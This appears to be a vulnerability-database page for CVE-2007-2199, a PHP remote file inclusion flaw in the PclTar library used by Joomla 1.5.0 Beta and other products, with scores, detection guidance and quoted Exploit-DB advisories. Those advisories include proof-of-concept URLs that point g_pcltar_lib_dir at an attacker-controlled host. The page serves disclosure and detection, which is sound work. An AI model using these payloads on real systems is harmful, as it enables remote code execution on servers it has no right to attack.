CVE-2007-2199
published 2007-04-24CVE-2007-2199: PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as…
PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
46.76%
98.7th percentile
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cjg_explorer_pro | cjg_explorer_pro | <= 3.3 | — |
| cjg_explorer_pro | cjg_explorer_pro | — | — |
| joomla | joomla | — | — |
| nx | n_x_wcms | — | — |
| phpsitebackup | phpsitebackup | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests containing the 'g_pcltar_lib_dir' parameter with a remote URL value, indicating attempted PHP remote file inclusion exploitation. ↗
- →Monitor GET requests to pcltar.lib.php or pcltrace.lib.php with g_pcltar_lib_dir set to an external URL or shell path (e.g., g_pcltar_lib_dir=http:// or g_pcltar_lib_dir=shell). ↗
- →Monitor GET requests to /libraries/pcl/pcltar.php with g_pcltar_lib_dir parameter containing a URL (e.g., http://hacker/?) in Joomla 1.5.0 Beta deployments. ↗
- →The vulnerable include statement dynamically includes a remote path: include($g_pcltar_lib_dir."/pclerror.lib.php"); — alert on any user-controlled value reaching this include call. ↗
- ·Exploitation requires PHP's allow_url_include (or allow_url_fopen) to be enabled on the server; the RFI vector is only reachable when the g_pcltar_lib_dir parameter is not sanitized and remote URL inclusion is permitted. ↗
- ·The vulnerability affects multiple products sharing the same PclTar library: Joomla! 1.5.0 Beta, N/X WCMS 4.5, CJG EXPLORER PRO 3.3, and phpSiteBackup 0.1 — detection rules should cover all known vulnerable paths across these products. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6f7q-42f8-cprg: ** DISPUTED ** PHP remote file inclusion vulnerability in pcltrace
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2007-2660 [MEDIUM] GHSA-6f7q-42f8-cprg: ** DISPUTED ** PHP remote file inclusion vulnerability in pcltrace
** DISPUTED ** PHP remote file inclusion vulnerability in pcltrace.lib.php in the PclTar module in Vincent Blavet PhpConcept Library, as used in CJG EXPLORER PRO 3.3 and earlier and probably other products, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter. NOTE: CVE disputes this issue since there is no include statement in pcltrace.lib.php. NOTE: the pcltar.lib.php vector is already covered by CVE-2007-2199.
GHSA
GHSA-gfmp-6wvc-g9jj: PHP remote file inclusion vulnerability in lib/pcltar
ghsa_unreviewed·2022-05-01
CVE-2007-2199 [MEDIUM] CWE-94 GHSA-gfmp-6wvc-g9jj: PHP remote file inclusion vulnerability in lib/pcltar
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.
No detection rules found.
Exploit-DB
PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion
exploitdb·2007-06-26
CVE-2007-2199 PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion
PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion
---
# phpSiteBackup 0.1 (pcltar.lib.php) Remote File Include Vulnerability
# D.Script:
http://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz
# Exploit:
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
# D.Vidoe:
http://my-story.org/uploads/phpSiteBackup.rar
# Discovered by:
GoLd_M = [Mahmood_ali]
# Homepage:
http://www.Tryag.Com/cc
# Greetz To:
Tryag-Team & AsbMay's Group & Crackers_Child & Rf7awy & t0pP8uZz :D
# milw0rm.com [2007-06-26]
Exploit-DB
CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion
exploitdb·2007-05-13
CVE-2007-2660 CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion
CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion
---
#######################S==A==U==D==I#########################
CJG EXPLORER PRO v3.2 (pcltar.lib.php)(pcltrace.lib.php) Remote File
Include Vulnerabilities
##############################################################
Found By : Mogatil , [email protected]
##############################################################
Script Site :
http://www.zascom.com/download/PHP/1868-CEP-PHP.ZIP
##############################################################
File : /pcltar.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");
File : /pcltrace.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");
##############################################################
Thanx: [cold zero] [gawey Al Azary] [crazy man] [scorbion_22]
[the_
Exploit-DB
Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion
exploitdb·2007-04-23
CVE-2007-2199 Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion
Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion
---
Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :
File /libraries/pcl/pcltar.php, Line 74 :
if (!defined("PCLERROR_LIB"))
{
include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
}
POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html
- Omid
# milw0rm.com [2007-04-23]
No writeups or analysis indexed.
http://osvdb.org/34803http://osvdb.org/36009http://secunia.com/advisories/25230http://www.attrition.org/pipermail/vim/2007-May/001618.htmlhttp://www.hackers.ir/advisories/joomla.htmlhttp://www.securityfocus.com/archive/1/466687/100/0/threadedhttp://www.securityfocus.com/archive/1/478503/100/0/threadedhttp://www.securityfocus.com/bid/23613http://www.securityfocus.com/bid/23708http://www.securityfocus.com/bid/24660http://www.securityfocus.com/bid/25528http://www.vupen.com/english/advisories/2007/1511https://exchange.xforce.ibmcloud.com/vulnerabilities/33837https://exchange.xforce.ibmcloud.com/vulnerabilities/34273https://exchange.xforce.ibmcloud.com/vulnerabilities/35092https://www.exploit-db.com/exploits/3781https://www.exploit-db.com/exploits/3915https://www.exploit-db.com/exploits/4111http://osvdb.org/34803http://osvdb.org/36009http://secunia.com/advisories/25230http://www.attrition.org/pipermail/vim/2007-May/001618.htmlhttp://www.hackers.ir/advisories/joomla.htmlhttp://www.securityfocus.com/archive/1/466687/100/0/threadedhttp://www.securityfocus.com/archive/1/478503/100/0/threadedhttp://www.securityfocus.com/bid/23613http://www.securityfocus.com/bid/23708http://www.securityfocus.com/bid/24660http://www.securityfocus.com/bid/25528http://www.vupen.com/english/advisories/2007/1511https://exchange.xforce.ibmcloud.com/vulnerabilities/33837https://exchange.xforce.ibmcloud.com/vulnerabilities/34273https://exchange.xforce.ibmcloud.com/vulnerabilities/35092https://www.exploit-db.com/exploits/3781https://www.exploit-db.com/exploits/3915https://www.exploit-db.com/exploits/4111
2007-04-24
Published